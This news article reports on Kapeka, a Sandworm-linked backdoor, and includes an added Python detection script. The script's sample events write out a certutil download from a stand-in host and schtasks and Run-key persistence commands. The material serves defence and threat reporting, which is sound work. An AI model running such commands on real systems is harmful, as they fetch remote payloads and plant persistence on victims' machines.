A previously undocumented "flexible" backdoor called Kapeka has been "sporadically" observed in cyber attacks targeting Eastern Europe, including Estonia and Ukraine, since at least mid-2022.
The findings come from Finnish cybersecurity firm WithSecure, which attributed the malware to the Russia-linked advanced persistent threat (APT) group tracked as Sandworm (aka APT44 or Seashell Blizzard). Microsoft tracks the same malware under the name KnuckleTouch.
"The malware [...] is a flexible backdoor with all the necessary functionalities to serve as an early-stage toolkit for its operators, and also to provide long-term access to the victim estate," security researcher Mohammad Kazem Hassan Nejad said.
Kapeka comes fitted with a dropper that is designed to launch and execute a backdoor component on the infected host, after which it removes itself. The dropper is also responsible for setting up persistence for the backdoor, either as a scheduled task or as an autorun registry entry, depending on whether the process has SYSTEM privileges.
Microsoft, in its own advisory released in February 2024, described Kapeka as involved in multiple campaigns distributing ransomware and said it can be used to carry out a variety of functions, such as stealing credentials and other data, conducting destructive attacks, and granting threat actors remote access to the device.
The backdoor is a Windows DLL written in C++ and features an embedded command-and-control (C2) configuration that is used to establish contact with an actor-controlled server and holds information about how often the server needs to be polled in order to retrieve commands.
Besides masquerading as a Microsoft Word add-in to make it appear legitimate, the backdoor DLL gathers information about the compromised host and implements multi-threading to fetch incoming instructions, process them, and exfiltrate the results of the execution to the C2 server.
"The backdoor utilizes WinHttp 5.1 COM interface (winhttpcom.dll) to implement its network communication component," Nejad explained. "The backdoor communicates with its C2 to poll for tasks and to send back fingerprinted information and task results. The backdoor utilizes JSON to send and receive data from its C2."
The implant is also capable of updating its C2 configuration on-the-fly by receiving a new version from the C2 server during polling. Some of the main features of the backdoor allow it to read and write files from and to disk, launch payloads, execute shell commands, and even upgrade and uninstall itself.
The exact method by which the malware is propagated is currently unknown. However, Microsoft noted that the dropper is retrieved from compromised websites using the certutil utility, underscoring the use of a legitimate living-off-the-land binary (LOLBin) to orchestrate the attack.
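The two behaviours described above, a dropper fetched with certutil and persistence set up as either a scheduled task or an autorun registry entry, both leave process-creation telemetry that a defender can check. The following Python is an added example written for this page, not code from WithSecure, Microsoft or the report; it runs those two checks over constructed Sysmon-style process-creation events. The event records, file names, task name and URL are made up for the example and are not indicators from the report.

```python
"""Detection checks for two behaviours described in the article, run over
constructed process-creation events (Sysmon Event ID 1 style; not real telemetry):
  1. certutil.exe used to fetch a URL to disk (LOLBin retrieval of a dropper)
  2. persistence created as a scheduled task or Run-key autorun whose target
     lives in a user-writable directory
"""
from dataclasses import dataclass
import ntpath
import re


@dataclass
class ProcEvent:
    """One process-creation record (constructed for this example)."""
    user: str
    image: str          # full path of the created process
    parent_image: str   # full path of the parent process
    cmdline: str


# certutil switches that write a URL's content to disk
CERTUTIL_FETCH_SWITCHES = {"-urlcache", "-verifyctl"}
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
# autorun registry locations written with 'reg add'
RUN_KEY_RE = re.compile(r"\\currentversion\\run(once)?(\\|\s|$)", re.IGNORECASE)
# '/tr' argument of schtasks, quoted or bare
TR_RE = re.compile(r'/tr\s+(?:"([^"]+)"|(\S+))', re.IGNORECASE)
# directories a non-admin user can write to; a task or Run entry pointing here is suspicious
USER_WRITABLE_RE = re.compile(r"\\(temp|appdata|programdata|users\\public)\\", re.IGNORECASE)


def basename(path):
    return ntpath.basename(path).lower()


def tokens(cmdline):
    return cmdline.lower().split()


def is_certutil_download(ev):
    """certutil.exe invoked with a fetch switch and a URL argument."""
    if basename(ev.image) != "certutil.exe":
        return False
    has_fetch_switch = bool(set(tokens(ev.cmdline)) & CERTUTIL_FETCH_SWITCHES)
    return has_fetch_switch and URL_RE.search(ev.cmdline) is not None


def scheduled_task_target(cmdline):
    """Return the /tr target of a 'schtasks /create' command, or None."""
    if "/create" not in tokens(cmdline):
        return None
    m = TR_RE.search(cmdline)
    return (m.group(1) or m.group(2)) if m else None


def is_suspicious_persistence(ev):
    """Scheduled task or Run-key autorun whose target is in a user-writable directory."""
    name = basename(ev.image)
    if name == "schtasks.exe":
        target = scheduled_task_target(ev.cmdline)
        return target is not None and USER_WRITABLE_RE.search(target) is not None
    if name == "reg.exe":
        return ("add" in tokens(ev.cmdline)
                and RUN_KEY_RE.search(ev.cmdline) is not None
                and USER_WRITABLE_RE.search(ev.cmdline) is not None)
    return False


def classify(ev):
    """Return the list of finding tags raised by one event."""
    findings = []
    if is_certutil_download(ev):
        findings.append("lolbin_certutil_download")
    if is_suspicious_persistence(ev):
        kind = "scheduled_task" if basename(ev.image) == "schtasks.exe" else "run_key"
        findings.append("persistence_" + kind)
    return findings


def scan(events):
    """(event index, finding tag) pairs over a batch of events."""
    return [(i, f) for i, ev in enumerate(events) for f in classify(ev)]


# Constructed sample events: the first three should fire, the last two are benign noise.
SAMPLE_EVENTS = [
    ProcEvent("CORP\\alice", r"C:\Windows\System32\certutil.exe", r"C:\Windows\System32\cmd.exe",
              r"certutil -urlcache -split -f http://example.invalid/stage/x.dat C:\Users\alice\AppData\Local\Temp\x.dat"),
    ProcEvent("NT AUTHORITY\\SYSTEM", r"C:\Windows\System32\schtasks.exe", r"C:\ProgramData\x.exe",
              r'schtasks /create /tn UpdateCheck /tr "C:\ProgramData\x.exe" /sc onstart /ru SYSTEM'),
    ProcEvent("CORP\\alice", r"C:\Windows\System32\reg.exe", r"C:\Users\alice\AppData\Local\Temp\x.exe",
              r'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v UpdateCheck /t REG_SZ /d "C:\Users\alice\AppData\Local\Temp\x.exe" /f'),
    ProcEvent("CORP\\bob", r"C:\Windows\System32\certutil.exe", r"C:\Windows\System32\cmd.exe",
              r"certutil -hashfile C:\tools\setup.msi SHA256"),
    ProcEvent("NT AUTHORITY\\SYSTEM", r"C:\Windows\System32\schtasks.exe", r"C:\Windows\System32\svchost.exe",
              r'schtasks /create /tn Backup /tr "C:\Program Files\Backup\agent.exe" /sc daily'),
]

if __name__ == "__main__":
    for idx, tag in scan(SAMPLE_EVENTS):
        ev = SAMPLE_EVENTS[idx]
        print(f"[{tag}] user={ev.user} image={ev.image} cmd={ev.cmdline}")
```

The persistence check keys on the target path rather than on the tool alone, because `schtasks /create` and `reg add` are common in legitimate administration; the user field on each event is kept so an analyst can see the privilege split the article describes (a SYSTEM-level scheduled task versus a per-user Run key).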
Kapeka's connections to Sandworm stem from conceptual and configuration overlaps with previously disclosed families like GreyEnergy, a likely successor to the BlackEnergy toolkit, and Prestige.
"It is likely that Kapeka was used in intrusions that led to the deployment of Prestige ransomware in late 2022," WithSecure said. "It is probable that Kapeka is a successor to GreyEnergy, which itself was likely a replacement for BlackEnergy in Sandworm's arsenal."
"The backdoor's victimology, infrequent sightings, and level of stealth and sophistication indicate APT-level activity, highly likely of Russian origin."
Some parts of this article are sourced from:
thehackernews.com